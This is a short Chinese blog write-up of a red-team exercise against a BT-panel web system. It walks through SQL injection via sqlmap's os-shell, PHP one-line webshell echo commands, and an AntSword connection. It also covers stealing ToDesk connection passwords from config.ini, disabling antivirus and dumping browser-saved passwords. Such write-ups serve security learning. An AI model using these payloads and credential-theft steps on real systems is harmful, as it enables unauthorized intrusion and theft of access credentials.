记一次攻防演练找到简单突破口

admin 2023年10月20日14:06:20评论50 views字数 709阅读2分21秒阅读模式

首先拿到目标单位名在企查查等上面没查到有网址:

记一次攻防演练找到简单突破口

然后从fofa上根据title搜到几个可以打开的系统,搜一下旁站信息,是bt建的站

记一次攻防演练找到简单突破口

开局一个登录框,抓包查看信息,像这种明文账号、密码的一般是先查看是否有waf没的话,直接sqlmap暴力注入测试,有注入的几率很大。

 

记一次攻防演练找到简单突破口

结果不出所料果真有注入,--os-shell直接administrator

记一次攻防演练找到简单突破口

接下开使用certutilcscriptcertutil等下载木马直接上线cs,但是这几个命令都试了——失败,这种可能是有杀软。

最后就是让目标报错——报出绝对路径——写木马

Windows echo一句话木马:

echo ^<? php @eval($_POST['123']); ?^> > shell.php

Linux

echo '<?php @eval($_POST["123"]); ?>' > 1.php

成功写入并链接:

使用蚁剑连接(由于宝塔命令执行限制,蚁剑插件可绕过)

完美执行命令

Windows的宝塔一般都是system权限。

 记一次攻防演练找到简单突破口

信息收集,发现目标装有火绒但是有todesk

记一次攻防演练找到简单突破口

todesk就好办很多,

可以读取todesk配置信息,默认目录文件:C:Program FilesToDeskconfig.ini

将目标的config.ini中的tempAuthPassEx值,替换掉自己的,然后打开自己的todesk即可看到连接密码。

最后连上todesk

内网信息收集

不知道为啥bt default读取的宝塔账号密码不正确;

关闭杀毒软件——上传WebBrowserPassView读取浏览器存储的密码,读到了bt密码;

记一次攻防演练找到简单突破口

本地登录bt:

记一次攻防演练找到简单突破口


原文始发于微信公众号(fly的渗透学习笔记):记一次攻防演练找到简单突破口

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月20日14:06:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次攻防演练找到简单突破口http://cn-sec.com/archives/2130181.html

发表评论

匿名网友 填写信息